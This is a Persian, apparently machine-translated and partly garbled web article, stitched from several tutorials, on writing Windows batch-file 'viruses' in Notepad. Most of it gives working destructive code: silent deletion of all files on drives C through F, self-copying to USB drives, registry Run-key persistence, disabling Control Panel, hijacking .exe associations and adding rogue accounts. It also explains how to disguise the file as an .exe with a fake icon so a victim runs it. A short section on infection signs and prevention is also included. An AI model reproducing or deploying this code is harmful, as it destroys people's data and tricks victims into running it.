آیا امکان ایجاد ویروس وجود دارد؟ چگونه یک ویروس کامپیوتری بسازیم، بنویسیم؟ پاک کردن تمام فایل ها

ویروس‌ها معمولاً برای خراب کردن زندگی دیگران نوشته می‌شوند - فضای خالی را روی رایانه شخصی «خوردن»، غیرفعال کردن سیستم، «شک کردن» رمزهای عبور و غیره. دوست چنین ویروسی در پنج دقیقه نوشته می شود و هیچ کار مهمی با سیستم انجام نمی دهد. رایج ترین ویروس های جوک خاموش کردن رایانه شخصی، باز کردن چندین بار یک برنامه و نمایش متن های خنده دار است.

ویروس های بی تکلف مشابهی در Notepad استاندارد (Notepad) ایجاد می شوند، با این تفاوت که با وضوح txt. ذخیره نمی شوند، بلکه در قالب یک فایل دسته ای .bat ذخیره می شوند.

چگونه ویروس بسازیم

بیایید گام به گام نحوه نوشتن ویروسی را که به طور مکرر یک برنامه را باز می کند، در نظر بگیریم.

  1. Notepad را با کلیک راست روی دسکتاپ و انتخاب New → Text Document باز کنید.
  2. ما شروع به پر کردن ویروس خود با دستورات می کنیم
    • @echo off //در این خط، خروجی دستورات را ممنوع می‌کنیم
    • echo "process is running" //متنی که کاربر خواهد دید
    • mspaint را شروع کنید
    • goto:p // چندین بار اجرا شود برنامه های رنگ آمیزی
    • مکث // هر کلیدی را فشار دهید
    • del %0 //ویروس خود تخریب می شود
  3. برای فایل ذخیره شده، نماد را به یک مورد محبوب تر (مرورگر، word و غیره) تغییر دهید و نام مناسب را وارد کنید.

چند قرعه کشی احتمالی دیگر:

نوعی محافظ صفحه نمایش فیلم "ماتریکس"

  • @echo خاموش
  • رنگ 2
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • اکو 1185585851851891704148 1185585851851891704148
  • برو به
  • مکث

نحوه عملکرد دکمه های ماوس را تغییر دهید

  • %SystemRoot%/system32/rundll32 user32، ​​SwapMouseButton >nul

تغییر زمان

  • ساعت 0:00

غیرفعال کردن صفحه کلید

  • صفحه کلید rundll32، غیر فعال کنید

غیرفعال کردن ماوس

  • ماوس rundll32، غیر فعال کنید

ما ساده‌ترین و بی‌ضررترین راه‌ها را برای کلاهبرداری با یک دوست بررسی کردیم. در واقع، با مطالعه دستورات سیستم، می توانید به طور غیرقابل برگشتی سیستم را روی رایانه شخص دیگری قرار دهید (و حتی به تنهایی در اثر سهل انگاری).

درباره وجود انواع متفاوتشما همچنین می توانید در مورد ویروس ها از مقاله یاد بگیرید، اما نباید به این موضوع بپردازید تا مشکلات غیر ضروری برای خود و دیگران ایجاد نکنید. بهتر است مراقب محافظت باشید کامپیوتر خودو قابل اعتماد قرار دهید برنامه آنتی ویروس، تا گرفتار شوخی دوست یا دشمن نشوید.

اخیرا تصمیم گرفتم افق های خود را در زمینه امنیت کمی گسترش دهم و کمی در نت در این موضوع جستجو کردم. ویروس های سادهدر شرایط صنایع دستی به نظر می رسد که ویروس ها را می توان حتی در یک دفترچه یادداشت ساده ایجاد کرد. من این اطلاعات را فقط برای مقاصد اطلاعاتی ارائه می کنم. به یاد داشته باشید نوشتن ویروس بد است. احتمالاً دوست ندارید رایانه مورد علاقه شما آلوده شود، بنابراین این کار را با دیگران انجام ندهید.

ما یک فایل bat را در یک دفترچه یادداشت معمولی ویندوز خواهیم نوشت. ما یک فایل ایجاد می کنیم و می نویسیم.

@Echo خاموش (منع نمایش دستورات اجرایی)
Echo Virus Loading (کتیبه "Virus Loading" را روی صفحه نمایش می دهد. می توانید هر چیزی را به جای آن بنویسید)
تاریخ 96/09/13 (این خط تاریخ را تغییر می دهد)
در صورت وجود c:ski.bat goto abc (وجود فایل را بررسی می کند، …..)
%0 c:ski.bat را کپی کنید (ویروس را فقط با تغییر نام کپی می کند)
Attrib +h c:ski.bat (ویژگی ski.bat را پنهان می کند
Echo c:ski.bat >>autoexec.bat (فایل ski.bat را برای بارگیری خودکار تجویز می کند
:abc (……اگر وجود داشته باشد، برنامه به برچسب:abc می‌رود)
md PRIDUROK
md LUZER
md DURAK (پوشه های خالی ایجاد می کند)
md LAMER
برچسب E: PRIDUROK (CD-ROM PRIDUROK نامیده می شود)
assoc .exe=.mp3 (همه اقدامات را به عنوان موسیقی اجرا می کند
del c:Program Files/q (تمام فایل‌ها را از این پوشه حذف می‌کند)
Echo VIRUS LOAD (یک کتیبه را نشان می دهد)

بنابراین ما یک ویروس ساده نوشتیم. حالا روی FILE>>SAVE AS کلیک کنید و در قسمت نام فایل بنویسید مثلا virus.bat
.bat در همه جا مورد نیاز است. یک نماد MS-DOS ظاهر شد. برای اینکه قربانی نتواند کد خود را ببیند، از WIinRar استفاده می کنیم. ما ویروس خود را می گیریم و آن را به بایگانی می اندازیم، یک پنجره ظاهر می شود و شما فقط کادر "create SFX archive" را علامت بزنید. در مرحله بعد به قسمت advanced رفته و گزینه های SFX را باز کنید و بعد از بسته بندی خطی برای اجرا وجود دارد و نام REAL ویروس خود را می نویسید. ببینید، یک دفترچه یادداشت ساده به عنوان یک ویروس ساز عمل می کند و WinRar ظاهرا یک برنامه ساخته است .... شما نتیجه گیری خود را انجام می دهید. و خودت درگیرش نباش. فایل های موجود در اینترنت را از افراد غریبه نپذیرید و به اندازه فایل نگاه کنید.

Reg - کار مستقیم با رجیستری. رگ / را ببینید هر کس!
rcp - به اشتراک گذاری فایل ها از طریق rcp به ascii
runas - از طرف کاربر
tasklist - برنامه ها و جلسات مرتبط با آن را نمایش می دهد.
taskkill - به شما امکان می دهد یک یا چند فرآیند را بکشید
tftp - ftp بی اهمیت
tskill - کشتن یک فرآیند
reg - ابزاری برای تعامل با رجیستری
bootcfg - تنظیمات boot.ini
ضمیمه - به شما امکان می دهد باز کنید فایل های حذف شدهانگار در حال حاضر هستند.
getmac - دریافت مک
logoff - جلسه کاربر نهایی.
mem - نمایش اطلاعات در مورد فرآیندهای فعلی در RAM
mqbkup - آرشیو کردن
نتش - ??
openfiles - مشاهده فایل های باز.
rsh - دستورات را بر روی هاست های راه دور در حال اجرا rsh اجرا کنید
sc - خط فرمان
rexec - اجرای دستورات بر روی میزبان های راه دور در حال اجرا rexec
shutdown - خاموش کردن (hehe) کامپیوتر محلی یا راه دور.
systeminfo - اطلاعات خروجی در مورد کامپیوتر.
schtasks - زمانبندی کار.
xcopy - کپی فایل ها و دایرکتوری ها.
tsshutdn - سرور را در زمان مناسب خاموش کنید.
تنظیم - نمایش، تنظیم و حذف متغیرهای محیطی cmd.exe. ویژگی های سیستم (pr.kn. "کامپیوتر من") - پیشرفته - متغیرهای محیطی. همه متغیرها وجود ندارند، اما بسیاری از متغیرها وجود دارند! همه چیز برای تماشا فقط یک مجموعه است.
به هر حال، در اینجا برخی از دستورات RunDLL وجود دارد که می توان از آنها هنگام ایجاد فایل های دسته ای استفاده کرد

دسته ای و اجرا
اشکالات

در این زمان، همانطور که ما فرض می کنیم، ویروس ها ده ها هزار بار در حال تکثیر هستند. آنها در دهه 80 ظاهر شدند. در آن روزها، دنیا یاد گرفت که ویروس ها چیست و وقتی وارد رایانه شخصی می شوند چه می کنند. امروز "SMOKED" را به شما خواهم گفت که چگونه ویروس خود را در یک دفترچه یادداشت بسازید، و می خواهم بگویم که این فقط یک فایل دستوری است که فقط به سیستم و ریزپردازنده دستور می دهد.
بیشترین لذت در این کار این است که کاربر متوجه نخواهد شد که برنامه او در واقع یک بمب برای ویندوز است.
پس بیایید شروع کنیم. شما تصمیم گرفته اید که یک ویروس نویس شوید. من فوراً به شما می گویم که البته این ویروس ها می توانند به رایانه آسیب زیادی وارد کنند ، اما نمی توانند به طور کامل از یک رایانه به رایانه دیگر منتقل شوند. شما و فقط شما مسئول هر اتفاقی که برای رایانه شما می افتد هستید. در اینجا ما فقط به یک دفترچه یادداشت نیاز داریم.
بیا شروع کنیم:

1) دفترچه یادداشت را باز کنید.
2) ما در آن "mspaint"، بدون نقل قول می نویسیم.
3) فایل را با هر نامی ذخیره می کنیم، اما به جای txt .bat می نویسیم.
4) فایل را باز کنید و ببینید که Paint  را باز کرده است
این اولین برنامه ماست. به جای “mspaint” می توانید وارد هر برنامه ای شوید، به عنوان مثال: Calc-calculator، Taskmgr-task manager... اما ویروس ها چه ربطی به آن دارند؟ - تو پرسیدی. هیچ چی!  کار بعدی که انجام می دهیم برنامه ای برای تغییر ساعت در کامپیوتر است و علاوه بر این، خود را در یک درایو فلش USB کپی می کند (در صورت قرار دادن یکی).
بنابراین، ما در دفترچه یادداشت می نویسیم:

ساعت 00:00
%0 F:\Work.bat را کپی کنید

در خط اول زمان را به 00:00 تغییر می دهیم و در خط دوم فایل را روی دیسک (F, G, J, K, H) کپی می کنیم - یک درایو فلش به نام Work. فراموش نکنید که فایل دفترچه یادداشت را به صورت فایل bat. ذخیره کنید. به جای زمان، می توانید تاریخ "تاریخ 06/13/23" را نیز تغییر دهید. با نوشتن چنین خطی، تاریخ را به 2023، ششمین ماه، سیزدهم تغییر می دهیم.   اکنون یک لیست کوچک از آنچه می توان در ویروس notepad نوشت.

فهرست:

1) "copy %0 x:\y" - ویروس را در دیسک x در پوشه y کپی می کند (به عنوان مثال کپی %0 C:\System.bat).
2) "label x:y" - دیسک x را به y تغییر نام می دهد (برچسب مثال C: error).
3) "زمان x:y" - زمان را با x ساعت و y دقیقه تغییر می دهد (زمان مثال 14:27).
4) "تاریخ x.y.z" - تاریخ را به x روز، y ماه، سال z تغییر می دهد (تاریخ مثال 11/16/05).
5) "md x" - پوشه ای را در محلی که ویروس ما قرار دارد با نام x ایجاد می کند (مثال md Papka).
6) "del *.* /q" - تمام فایل ها (ویروس ما نیز) را در پوشه ای که ویروس ما در آن قرار دارد (به جز پوشه ها) حذف می کند.
7) "del x:\y *.* /q" - تمام فایل های روی دیسک x را در پوشه y (به جز پوشه ها) حذف می کند (مثال del F:\Data*.* /q);
.
9) "کاربر خالص "x" / افزودن" - کاربر تحت نام x را به رایانه اضافه می کند (به عنوان مثال کاربر خالص "Smoked" / add)؛

در اینجا دو برنامه برای شما در نظر گرفته شده است، شما می توانید بدون موافقت من از آنها استفاده کنید، اما با استفاده از آنها موافقت کاربر را می پذیرید.

1) برنامه ای برای حذف فایل ها از درایو فلش USB (در صورت قرار دادن آن) و تغییر نام آن.
del F:\ *.* /q
برچسب F: هک

2) برنامه ای برای تغییر تاریخ و زمان در رایانه و کپی کردن آن در دیسک C و درایو فلش USB.
ساعت 14:13
تاریخ 11.07.12
%0 C:\Time.bat را کپی کنید
%0 F:\Time.bat را کپی کنید
شما قبلاً می دانید که چگونه ویروس های ساده ایجاد کنید. او می تواند: زمان، تاریخ، نام دیسک ها و درایوهای فلش را تغییر دهد، برنامه ها را باز کند، پوشه بسازد، خودش را کپی کند، کاربران اضافه کند، پسوندها را تغییر دهد و اطلاعات را از بین ببرد. صادقانه بگویم، فهرست بسیار کوتاهی است. حالا نکات ظریف ویروس نویسی را به شما آموزش می دهم. فرض کنید قبلاً یک ویروس ساخته اید، اما به نظر زشت است. خوب، چه کسی یک فایل نامفهوم را باز می کند؟ حق با شماست، چنین افرادی در دنیا زیاد نیستند. نحوه تغییر فرمت از bat به .exe و اضافه کردن آیکون. بسیار آسان (شما باید WinRAR را در رایانه خود داشته باشید). ما هر ویروسی را با پسوند bat پیدا می کنیم، روی آن راست کلیک کنید، روی "افزودن به بایگانی ..." کلیک کنید. چک باکس "ایجاد بایگانی SFX" را علامت بزنید، تب advanced را انتخاب کنید و روی دکمه "SFX Options..." کلیک کنید. در پنجره "Run after unpacking" نام ویروس را بنویسید (به عنوان مثال Virus.bat) و در پنجره "Text and Graphics" سپس "Load SFX icon from file" را بنویسید. روی «مرور» کلیک کنید و هر نماد قالب .ico را پیدا کنید. حالا روی OK کلیک کنید. انجام شد  Format.exe، نه bat. همانطور که باید داشته باشیم. اکنون می توانید با ویروس ها هر کاری انجام دهید. دقیقا چه چیزی به شما بستگی دارد.
فرض کنید ویروسی نوشته اید که اطلاعات باز شده از پوشه ها را خراب می کند و آسیب می رساند:

del C:\ *.* /q
del D:\ *.* /q
delE:\ *.* /q
del F:\ *.* /q
ساعت 00:00
تاریخ 23/06/13
del *.* /q

آیا ویروس ما آماده است؟ - از خودت بپرس. البته که نه. باید فوراً تمام شود. من با کمال میل به شما در این امر کمک خواهم کرد. و بنابراین دستور جدید ما "@echo off" در ابتدای ویروس ما وارد می شود و هر آنچه را که در آینده در آن اتفاق می افتد پنهان می کند. در یک کلام، ما اجازه نمی دهیم کاربر ببیند چه اتفاقی افتاده است. با اضافه کردن یک عمل ساده اما بسیار موثر بعد از هر دستور، مانند "> nul" به عنوان مثال "time 00:00 > nul"، خط را پنهان می کنیم. بنابراین، ما می توانیم ویروس خود را بهبود بخشیم:

@echo خاموش
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
ساعت 00:00 > صفر
تاریخ 13.06.23 > nul
del *.* /q >nul

در اینجا، اکنون ویروس ما آماده است. می توانید آن را بررسی کنید. اما من به شما توصیه نمی کنم آن را در رایانه شخصی خود بررسی کنید  . ما صرفه جویی می کنیم، تبدیل می کنیم، اما کاری که بعداً با آن انجام دهید، به شما بستگی دارد. در ضمن یه برنامه عالی برای تبدیل bat به exe هست خیلی بهتر از WinRAR کار میکنه اسمش تبدیل bat به exe هستش میتونید از اینترنت دانلودش کنید رایگانه پس برگردید به ویروس نویسی .
%SystemRoot%/system32/rundll32 user32, SwapMouseButton این خط دکمه های ماوس را تعویض می کند. شما می توانید با کسی در حین رانندگی سرگرم شوید، چه اتفاقی افتاده است، زمان می گذرد (اگر کاملاً کاربر باشد)، برای افراد با استعداد، من می گویم که اگر آن را وارد کردید، آن را کاملاً ساده خاموش کنید: "کنترل پنل" ، "چاپگرها و سایر تجهیزات"، "ماوس" و علامت کادر اول را بردارید.
بنابراین، بیایید ادامه دهیم:

:ایکس؛
mspaint را شروع کنید
goto x ;

یک خط بسیار خوب برای بارگیری ماشین های ضعیف. دستور Paint را باز می کند و خیلی سریع. 60 بار قبل از اینکه متوجه شوید چه اتفاقی افتاده و برنامه را ببندید. سعی کنید هر خطی از برنامه را به جای mspaint وارد کنید... کار می کند  شما می توانید از چندین مورد از این دستورات استفاده کنید تا زمانی که کامپیوتر قربانی ما به طور کامل کند شود.

ما یک اسکریپت جدید می نویسیم:

"%0"" "%SystemRoot%\system32\File.bat" را کپی کنید
reg افزودن "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "File" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

یک فرمان بسیار بی رحمانه، برنامه ای را به راه اندازی سیستم عامل اضافه می کند. من به شما توصیه نمی کنم که رایانه خود را بررسی کنید. ما متوقف نمی شویم و ادامه می دهیم. 

assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul

با این دو خط به رایانه قربانی آسیب بسیار جدی وارد می کنیم. پسوند همه فایل‌های رایانه را از .lnk به txt. و exe. به mp3. تغییر می‌دهد. یعنی همه میانبرها در notepad باز می شوند و برنامه ها همه چیز در پلیر. باحال، آره؟ حالا کد زیر را بخوانید و اگر متوجه شدید که ماهیت ویروس چیست، به شما تبریک می‌گویم، دوره ابتدایی رایتینگ ویروس SMOKED را گذرانده‌اید. اگر نه. دوباره خواندن آن

@echo خاموش
%SystemRoot%/system32/rundll32 user32، ​​SwapMouseButton >nul
زمان 0:00 > صفر
تاریخ 13.06.23 > nul
برچسب C:IDIOT >nul
برچسب D:URAK >nul
برچسب E:SUKA >nul
برچسب F:GANDON >nul
%0 C:\Open.bat >nul را کپی کنید
%0 D:\Open.bat >nul را کپی کنید
کپی %0 E:\Open.bat >nul
%0 F:\Open.bat >nul را کپی کنید
کاربر شبکه "احمق که هک کردی" /add >nul
کاربر خالص "Bitch you Hacked" /add >nul
کاربر شبکه "Durak you Hacked" /add >nul
کاربر شبکه "Kritin you Hacked" /add >nul
کاربر شبکه "Gavno you Hacked" /add >nul
md 1 > nul
md 2 > nul
md 3 > nul
md 4 > nul
md 5 > nul
md 6 > nul
md 7 > nul
md 8 > nul
md 9 > nul
md 10 > nul
md 11 > nul
md 12 > nul
md 13 > nul
md 14 > nul
md 15 > nul
md 16 > nul
md 17 > nul
md 18 > nul
md 19 > nul
md 20 > nul
md 21 > nul
md 22 > nul
md 23 > nul
md 24 > nul
md 25 > nul
md 26 > nul
md 27 > nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:ایکس؛
mspaint را شروع کنید
goto x ;
:ایکس؛
Calc را شروع کنید
goto x ;
""%0"" "%SystemRoot%\system32\Cool.bat" >nul را کپی کنید
reg افزودن "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

این درس های من را به پایان می رساند. امیدوارم خوشت آمده باشد! با احترام، دودی! P.S. وقتی برای اولین بار این مقاله را در اینترنت گذاشتم. حدود 70 پیام به ICQ من آمد که خواستار هک شدن شدند صندوق پستی. همه چیز را خودم نوشتم، مقاله ام! 

این نرم افزاری است که هدف آن دسترسی غیرمجاز به منابع رایانه یا اطلاعات روی هارد دیسک است. اغلب برای ایجاد آسیب با کپی، تحریف، حذف، جایگزینی اطلاعات ایجاد می شود. بیایید بیشتر نحوه ایجاد یک ویروس جوک را برای محافظت از خود در برابر ویروس ها در نظر بگیریم.

ویروس چیست

قبل از ایجاد یک ویروس، باید دقیقاً تعریف کنید که چیست. برای اینکه یک برنامه مخرب در نظر گرفته شود، باید:

  • از بین بردن اطلاعات یا اختلال در عملکرد رایانه؛
  • بدون هشدار اجرا کنید؛
  • هدف صریح دسترسی غیرمجاز یا از بین بردن اطلاعات است.

ویروس های کامپیوتری باید تمام معیارهای فوق را داشته باشند. به عنوان مثال، یک کرکر محافظت از کپی یک بدافزار نیست. این فایل ها را از بین نمی برد، بلکه فقط یک رمز عبور برای باز کردن قفل انتخاب می کند. همچنین نمی توان برنامه ای برای قالب بندی دیسک را مخرب در نظر گرفت. داده های موجود در رایانه را از بین می برد، اما با رضایت کاربر انجام می شود. اگر برنامه اطلاعات را به دلیل خطاهای داخلی، همچنین ویروس محسوب نمی شود. اگرچه توسعه دهندگان را می توان به دلیل کار سهل انگارانه یا ناقض حقوق مصرف کننده مسئول دانست، زیرا این برنامه می تواند داده های مهم را حذف کند. به طور کلی هنوز معیارهای روشنی تعریف نشده است. برای اینکه یک برنامه ویروس تلقی شود، یک تخصص نرم افزاری و فنی انجام می شود.

انواع ویروس ها

چرا ویروس ایجاد کنیم؟ دلایل بسیاری وجود دارد. یک قسمت از فایل های مخرب واقعا خطرناک است و می تواند به عملکرد دستگاه آسیب برساند، در حالی که قسمت دیگر به طور غیر مستقیم آسیب می رساند. فهرست اهداف اصلی:

  1. بی ثباتی.
  2. نصب بدافزارهای دیگر
  3. دزدی، کلاهبرداری، جاسوسی.
  4. نرم افزار تبلیغاتی.
  5. دیگر.

ویروس های کامپیوتری تداخل ایجاد می کنند، می تواند باز و بسته شدن بدون علت درایو، خرابی سخت افزار باشد.

برخی از برنامه ها کاملاً حیله گرانه عمل می کنند. دانلود فایل های رسانه ای از یک پیوند آلوده می تواند منجر به دانلود بدافزار شود.

اسکن برای سرقت هر گونه اطلاعات استفاده می شود هارد دیسک، ثبت ضربه های کلید، هدایت کاربر به یک سایت جعلی. بنابراین، حساب‌ها دزدیده می‌شوند و برای ارسال هرزنامه استفاده می‌شوند، سیستم‌های پرداخت هک می‌شوند، رایانه‌ها برای اخاذی مسدود می‌شوند. پول. اتفاقاً این نرم افزار پولی است که پس از دانلود هیچ کار مفیدی انجام نمی دهد.

به دلیل یک فایل خراب، یک سرور پراکسی عمومی می تواند بر روی رایانه راه اندازی شود، دستگاه به عضویت یک بات نت تبدیل می شود و برای انجام حملات DDOS استفاده می شود. با رایج شدن بیت کوین، موارد استخراج مخفی در رایانه شخصی کاربران بیشتر شده است.

همچنین برنامه هایی وجود دارند که تبلیغات را نشان می دهند یا جمع آوری می کنند اطلاعات مختلفبرای اهداف بازاریابی

نحوه ایجاد ویروس

در Notepad (یا بهتر است بگوییم، در هر ویرایشگر متن) می توانید یک برنامه مخرب ایجاد کنید و می توانید آن را به همان روشی که برنامه های معمولی ایجاد می کنید انجام دهید. از هر زبان برنامه نویسی استفاده می شود. معمولاً این C++ است، اما ممکن است دلفی و دات نت باشد. هدف از ایجاد ویروس می تواند یک شوخی یا مقدمه ای برای نحوه عملکرد آن باشد. برنامه سادهمستقیماً در Notepad نوشته می شود و خود کد خطوط بسیار کمی را اشغال می کند.

اگر اینترنت را خاموش کنید و استفاده از نرم افزارهای غیرقانونی را متوقف کنید، می توانید به طور کامل ویروس را از ورود به رایانه خود حذف کنید. فایل های حاوی ویروس حتی بدون اتصال به اینترنت نیز می توانند کار کنند. در این صورت به اطلاعات روی هارد کاربر آسیب می رسانند یا باعث می شوند برنامه ها به درستی کار نکنند.

امروزه هدف اصلی هکرها توسعه برنامه های مخربی نیست که به وضوح به عملکرد سیستم آسیب برساند، بلکه ایجاد محصولاتی است که رفتاری بی سر و صدا دارند. آنها می توانند کار کنند برای مدت طولانیو در یک لحظه آسیب بسیار جدی ایجاد خواهد کرد.

علائم عفونت

قبل از ایجاد ویروس، مهاجمان تمام راه هایی را که می توان آن را شناسایی کرد تجزیه و تحلیل می کنند و سعی می کنند آنها را دور بزنند. آنتی ویروس ها به طور موثر فایل های مخرب را پیدا می کنند، اما به دلیل خطای کاربر، می توان برخی از آنها را به موارد استثنا اضافه کرد. برای اینکه به موقع نسبت به آلوده شدن رایانه واکنش نشان دهید، باید فعالیت های مشکوک و عجیب را ردیابی کنید.

بارزترین علائم عفونت:

  • باز کردن پنجره ها با محتوای ناآشنا؛
  • مسدود کردن دسترسی به سایت ها؛
  • فرآیندهای شخص ثالث در "Task Manager"؛
  • ورودی های جدید در autorun;
  • ناتوانی در ایجاد تغییرات در تنظیمات رایانه؛
  • راه اندازی مجدد یا خاموش شدن تصادفی کامپیوتر

برخی از علائم ممکن است ناشی از یک ویروس شوخی باشد و تهدید آشکاری برای سیستم ایجاد نکند. و برخی از آنها برای منحرف کردن توجه استفاده می شود در حالی که ویروس اصلی اطلاعات کاربر را جمع آوری می کند.

انتشار ویروس ها

حمله چند مرحله دارد. اولین مورد به این سوال پاسخ می دهد که چگونه یک ویروس ایجاد کنیم، یعنی یک مرحله تکنولوژیکی است. در مرحله دوم، بدافزار به رایانه تحویل داده می شود. راه های اصلی انتشار ویروس:

  • اکسپلویت از آسیب‌پذیری‌های نرم‌افزاری استفاده می‌کند که با کمک آن کنترل سیستم را به دست گرفته و عملکرد آن را مختل می‌کند.
  • بمب منطقی تحت شرایط خاصی کار می کند، از برنامه حاملی که در آن ادغام شده است جدایی ناپذیر است.
  • یک برنامه تروجان به عنوان یک برنامه قانونی به رایانه نفوذ می کند نرم افزار، اغلب بخشی از یک حمله چند مرحله ای برنامه ریزی شده است.
  • کرم ها به طور مستقل از طریق محلی و شبکه های جهانی، برای این کار از خطاهای اداری و همچنین ابزارهای مهندسی اجتماعی استفاده می شود.

پیشگیری و درمان

برای محافظت در برابر ویروس ها، آنتی ویروس هایی وجود دارد. آنها از نظر کیفی از سیستم محافظت می کنند، اما، به عنوان یک قاعده، خود کاربر در آلوده کردن سیستم مقصر است. بنابراین، شما نیاز دارید:

  • به‌روزرسانی‌ها را نصب کنید، از نسخه‌های دارای مجوز استفاده کنید.
  • کار بر روی رایانه تحت حقوق کاربر، نه سرپرست.
  • فایل های کامپیوتری را فقط از منابع قابل اعتماد باز کنید.
  • از فایروال استفاده کنید

چگونه یک ویروس جوک بسازیم

ویروس در درجه اول برنامه ای است که محتویات هر فایلی را تغییر می دهد. درست مثل هر برنامه دیگری ایجاد شده است. ساده ترین انواع بدافزار را می توان در Notepad ایجاد کرد. نیازی به مهارت یا دانش خاصی از زبان های برنامه نویسی ندارد.

چگونه در Notepad ویروس ایجاد کنیم؟

خطوط زیر 1000 پوشه را در یک ثانیه ایجاد می کند که کاربر را مبهوت می کند:

چگونه یک ویروس برای سرقت رمز عبور ایجاد کنیم؟ پاسخ به این سوال دشوارتر است. برای انجام این کار، باید به نحوه راه اندازی کاربر فکر کنید فایل مخربچگونه داده ها به سرقت خواهند رفت تنها پس از آن می توان پیاده سازی را آغاز کرد. این یک فرآیند بسیار پیچیده است. علاوه بر این، ممکن است غیرقانونی باشد، بنابراین ما به خوانندگان توصیه نمی کنیم که ویروس ها را برای هر هدفی (البته به جز برای اهداف آموزشی) ایجاد کنند.

ویروس‌های شوخی برنامه‌های ساده‌ای هستند که می‌توان آن‌ها را روی دوست (یا دشمن) گذاشت و آنها فکر می‌کنند رایانه‌شان هک شده، آلوده به ویروس یا آسیب جدی دیده است. ویروس های شوخی را می توان در یک دفترچه یادداشت معمولی نوشت: فقط باید دستوراتی را در پرونده بنویسید که سرعت رایانه را کاهش می دهد، کار را غیرفعال می کند. سیستم عاملیا فقط کاربر را ترسانده و سپس او را مجبور به اجرای این فایل کنید. ویروس‌های شوخی می‌توانند هر چیزی باشند، از یک مزاحم آزاردهنده تا یک کابوس سیستم‌شکنی. "ویروس های" در این مقاله فقط برای شوخی های بی ضرر هستند، بدترین کاری که می توانند انجام دهند خاموش کردن رایانه است. توجه:این ویروس های شوخی فقط برای رایانه های زیر طراحی شده اند کنترل ویندوز، بدون آموزش خاص روی سیستم عامل مک کار نخواهند کرد. بیایید با مرحله 1 شروع کنیم.

مراحل

ما یک ویروس جعلی می نویسیم که پنجره های "بی پایان" را باز می کند

Notepad را اجرا کنید.فایل های دسته ای (.BAT) حاوی دستوراتی برای رایانه در داخل هستند فرم متن. برای نوشتن یک فایل BAT، به ویرایشگر خاصی نیاز ندارید - فقط Notepad از مجموعه استاندارد برنامه های ویندوز. دفترچه یادداشت را می توان در منوی استارت یا در زیر منوی لوازم جانبی پیدا کرد. همچنین می توانید Notepad را با فشار دادن کلیدهای ترکیبی Win + R باز کنید، در قسمت متنی کادر محاوره ای ظاهر شده، "notepad" را تایپ کنید و Enter را فشار دهید.

"@echo off" و سپس "CLS" را در یک خط جدید تایپ کنید.فایل های BAT به طور پیش فرض یک پنجره را باز می کنند خط فرمانو دستورات اجرایی را خروجی می دهد. دستورات «@echo off» و «CLS» از نمایش دستورات در پنجره خط فرمان جلوگیری می‌کند و دلیل شوخی را برای «قربانی» نامرئی می‌کند.

دستوراتی برای باز کردن بسیاری از (یا بی نهایت) پنجره ها بنویسید.اکنون زمان نوشتن یک سری دستورات است که با اجرای آنها، ویروس جعلی شما پنجره های زیادی را باز می کند. برنامه های مختلفیک بار یا به طور نامحدود این پنجره ها را باز می کند. دانستن این نکته مهم است که اگر تعداد زیادی از پنجره ها بی انتها باز شوند، ممکن است کامپیوتر در نهایت یخ بزند. نحوه ساخت هر دو نوع "ویروس" را بخوانید:

  • بازکردن مسلم - قطعیتعداد پنجره ها، در یک خط جدید، دستور زیر را در Notepad تایپ کنید: شروع (نام برنامه). به جای عبارت داخل پرانتز، نام برنامه را در رایانه قربانی وارد کنید یایا نام کامل فایل اجرایی. این دستور به کامپیوتر دستور می دهد که پنجره برنامه مشخص شده را باز کند. مثلا، iexplore.exe را شروع کنیدپنجره ای را باز خواهد کرد اینترنت اکسپلورر. دستور "شروع" را هر چند بار که می خواهید تکرار کنید، "ویروس" شما هر چند بار که مشخص کرده اید پنجره را باز می کند. در اینجا چند برنامه وجود دارد که می توان بعد از دستور "شروع" وارد کرد:
    • iexplore.exe - مرورگر اینترنت اکسپلورر
    • calc.exe - ماشین حساب
    • notepad.exe - دفترچه یادداشت
    • winword.exe - Microsoft Word
  • بازکردن بی پایانتعداد پنجره ها را ابتدا در یک خط جدید تایپ کنید از جمله روده بزرگ. در خط بعدی تایپ کنید iexplore.exe را شروع کنید(یا یک برنامه دیگر). و در نهایت در خط زیر تایپ کنید برو به. این ترتیب دستورات باعث می شود که رایانه یک پنجره Internet Explorer (یا هر برنامه دیگری) را باز کند، به مکان درست قبل از باز شدن پنجره بازگردد، و سپس بلافاصله یک پنجره جدید باز کند تا زمانی که پنجره خط فرمان بسته شود یا کامپیوتر بسته شود. یخ می زند.
  • یک پیام در "ویروس" بنویسید.برای ایجاد یک اثر ترسناک، می توانید پیامی را به "ویروس" اضافه کنید که باعث می شود کاربر فکر کند مشکلی در رایانه او وجود دارد. برای نمایش یک پیام، یک خط جدید را شروع کرده و تایپ کنید بازتاب پیام شما. سپس در یک نوع خط جدید مکث. دستور "pause" اجرای "ویروس" را پس از ظاهر شدن پیام متوقف می کند.

    • برای اینکه شوخی خود را باورپذیر کنید، پیامی بنویسید که شبیه یک پیام خطای واقعی است، مانند این: خطای مرگبار دایرکتوری C:// خراب است.
  • متن را به صورت دسته ای ذخیره کنید.وقتی کارتان تمام شد، از منوی Notepad، را انتخاب کنید فایل > ذخیره به عنوان...، و سپس پسوند فایل ".bat" را مشخص کنید (به عنوان مثال، "pinball.bat"). از لیست کشویی «نوع فایل» «همه فایل ها» را انتخاب کنید. فایل را در جایی از رایانه قربانی ذخیره کنید.

